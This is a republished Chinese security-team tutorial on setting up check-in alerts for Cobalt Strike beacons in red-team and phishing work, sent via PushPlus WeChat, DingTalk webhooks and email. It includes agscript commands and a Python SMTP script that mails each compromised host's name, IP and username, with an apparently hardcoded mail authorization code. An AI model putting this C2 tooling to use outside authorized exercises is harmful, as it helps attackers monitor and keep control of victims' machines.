Redian新闻
>
Cobalt Strike的多种上线提醒方法

Cobalt Strike的多种上线提醒方法

科技

背景介绍


在实际攻防场景中,尤其是钓鱼中,我们不太可能一直保证CS在线,尤其是当网络存在波动,或者频繁的切换时。这时候就需要使用CS上线提醒。


现在正常使用的话,其实提醒无非分为三类。



微信提醒


以前大部分都是使用server酱进行微信推送,但是现在server酱免费版每日只能提醒5次,其余的都需要收费,而且单次信息中间要间隔1分钟。


所以在这使用的是pushplus,目前Pushplus的日发送频率最大额为200次,基本满足日常攻防使用。



微信单人提醒


打开http://www.pushplus.plus/push1.html,微信扫码关注登陆,会随机生成一个Token。



打开https://github.com/lintstar/CS-PushPlus里下载两个文件:PushPlus.cna和PushPlus.py。


在PushPlus.py中将你刚刚的token进行替换:



配置PushPlus.cna文件



需要注意的是,其中cmd中要使用绝对路径


其中title以及content内容可自由定制。


修改完成后,本地python3进行测试,




收到提示后,上传至服务器后台运行

sudo ./agscript xx.xx.xx.xx 端口 xx 密码 ./PushPlus.cna > PushPlus.log 2>&


微信多人提醒

访问http://www.pushplus.plus/push2.html保存自己的token,然后创建新的群组



在这里需要记住群组编号,按照Pushplus的官方文档,单人提醒与多人提醒增加了一个"topic"参数。这里需要配置的信息如下:"topic":"HW"



配置完成后,需要点击查看二维码进行订阅进入群组,包括创建人也是要扫码才能够进入群组的。
扫码完成后就会看到自己设置的提示消息。



同样在配置完成后,在本地进行测试,可正常收到信息后,移动到服务器上进行执行

问题

在实际部署过程中,可能存在部分问题。

如果提示hostname问题则修改/etc/hosts 在127.0.0.1 localhost 后面加上主机名称(hostname) 即可:127.0.0.1 localhost XXX


提示java问题,然后cs中只能看到用户退出,但是无法看到用户进入,所以消息不会被推送。
解决办法:注释/etc/java-8-openjdk/accessibility.properties第一行内容


另外在后台运行时,可能会提示CSAgent.jar问题



拿cs4.4举例,默认agscript中认证.jar是CSAgent.jar,而4.4中实际为hook,需要将agscript中的CSAgent.jar替换为hook.jar,其他版本只要换成相同的认证jar即可。


钉钉上线提醒


钉钉群和上述的方法基本相同,首先需要在钉钉中拉群一个群聊,并添加一个机器人:



设置自定义



选择添加即可获得一个Webhook地址

在公众号中个人设置-渠道配置


将钉钉机器人的webhook进行填写



确认之后,在脚本里面进行修改:"channel":"webhook", "webhook":"xxxx"

本地测试后即可服务器进行挂载。

邮件提醒


在Pushplus中,还提供了邮件提醒,配置的步骤上来讲,比较简单,在Pushplus中选择个人资料,绑定自己的邮箱:



确认后会发送确认邮件



然后在原来的代码上进行修改:只需修改"channel":"mail"即可。

注意事项


在使用Pushplus推送的流程中,还有一个比较重要的问题:如果短时间内有多个相同主机上线,Pushplus会默认不发送重复数据内容,而且对发送频率也有要求

在实际过程中,几乎很少会出现同一时间多个相同目标同时上线,如果存在这种情况,可在代码中加入时间戳进行判断。



隐蔽邮件提醒


使用第三方推送可能出现的问题就是信息泄露,这里也可以使用crow师傅写的脚本进行邮件提醒。


# -*- encoding: utf-8 -*-# Time : 2021/12/21 21:07:19# Author: crow
import argparseimport requestsimport randomimport stringimport jsonimport timeimport smtplibfrom email.mime.text import MIMETextfrom email.header import Header

parser = argparse.ArgumentParser(description='Beacon Info')parser.add_argument('--computername')parser.add_argument('--internalip')parser.add_argument('--username')args = parser.parse_args()
internalip = args.internalipcomputername = args.computernameusername = args.usernameran_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))t_time = time.ctime()
content = """
您有霉国-2新主机上线啦
主机名: {}IP: {}用户名: {}Token: {}上线时间:{}请注意查收哦~""".format(internalip, computername, username, ran_str, t_time)


#1. 发送文本文件
sender = '[email protected]' #发件人邮箱receiver = '[email protected]' #收件人邮箱mail_pass = 'cwxdebc' #qq邮箱授权码
#text为邮件正文内容,plain为文本格式,'utf-8'为编码格式# text = '您有新主机上线。。。'# contentmessage = MIMEText(content, 'plain', 'utf-8')
#添加Header信息,From,To,Subject分别为发送者信息,接收者消息和邮件主题message['From'] = Header(sender, 'utf-8')message['To'] = Header(receiver, 'utf-8')
subject = 'Cobalt Strike上线提醒'message['Subject'] = Header(subject, 'utf-8')

try: #smtp.xxx.com为邮箱服务类型,25为STMP的端口 smtpObj = smtplib.SMTP('smtp.qq.com', 25)#smtp.xxx.com为邮箱服务类型,25为STMP #smtpObj = smtplib.SMTP_SSL('smtp.xxx.com', 'xxx邮件服务的端口号')
smtpObj.login(sender, mail_pass)#登录 smtpObj.sendmail(sender, receiver, message.as_string())#发送 print ("邮件发送成功")except smtplib.SMTPException as e: print(e) print ("Error: 邮件发送失败")

然后修改一个CNA文件,同样服务器后台运行即可。


参考资料https://xz.aliyun.com/t/10698

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章400余篇,自研平台达到31个,目有18个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
干货—— awk 命令的多种用法Adobe Illustrator 的替代品 Inkscape 发布了 1.2 版本 | Linux 中国RSM Global已开放金融类2022 Industrial Placement!A Huzhou District Offers Free Study Camp to Attract TalentScience:构建出迄今为止最为庞大的多种人类器官的单细胞图谱重磅品种上市!万亿私募圈嗨了,8大私募最新解读!A Community Worker’s Account of Life on the COVID-19 Frontline[时尚] Travis Scott x Nike Air Max 1 “Baroque Brown”开箱东北区枪击案现场至少开50枪,3人受伤|5岁以下的儿童现在有资格接种新冠疫苗,但这并不意味着到处都能接种上A Shanghai District Declares Snap Lockdown for COVID TestingTCB 免费 $20 Nike,免费 $20 Sephora,免费 $20 Nordstrom RackMinistry Warns New Graduates of Tougher Job ProspectsIn Global Effort, Shanghai Astronomers Capture Milky Way’s Black俄乌战争的性质决定了结局不可能是韩国方案紧急召回!华人爱吃的这批斑点虾出事了,Costco等多种产品召回2022年猜奥斯卡奖市场博弈!Mobileye的「开放」和智能驾驶大规模「上车」大数据解析:儿科大咖lack, Robert E的临床科研经验[腕表] Jaeger-LeCoultre Rendez-Vous DazzlingShanghai’s Foreign Companies Strive to Bounce Back Post LockdownContra Costa县警长竞选主题直击公共安全资管State Street Global Advisors已开放金融类2022 Full Time!​300+篇文献!一文详解基于Transformer的多模态学习最新进展Shanghai’s 30-Year-Old Bakery Struggles to Beat Lockdown Woes大马路(南京路)的四大公司:永安公司Costco 6月懒人折扣来了!BBQ食物打骨折! 带娃神器上线, 儿童节买它解决所有烦恼!实现自给自足田园生活仅需15.99!IKEA官宣年中大促,降价幅度高达50%!800多种商品打折,华人别错过!在线提问:今晚移民局在线会议高考后的升学选择 | 直播话《留学》第三期回顾:多种路径解析,解锁升学的多元选择Coatue最新42页PPT分享,科技股熊市的多米诺骨牌明日之光First Step团队参与Great Strike募捐活动捣练子: 摄影欣赏 : 晚霞夕照尽流连China’s Music Platforms Are Streaming Fake TracksVR游戏周报 | 13款新游上线,包括《STRIDE》《致命节奏》等香港的科兴疫苗数据是否靠谱?
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。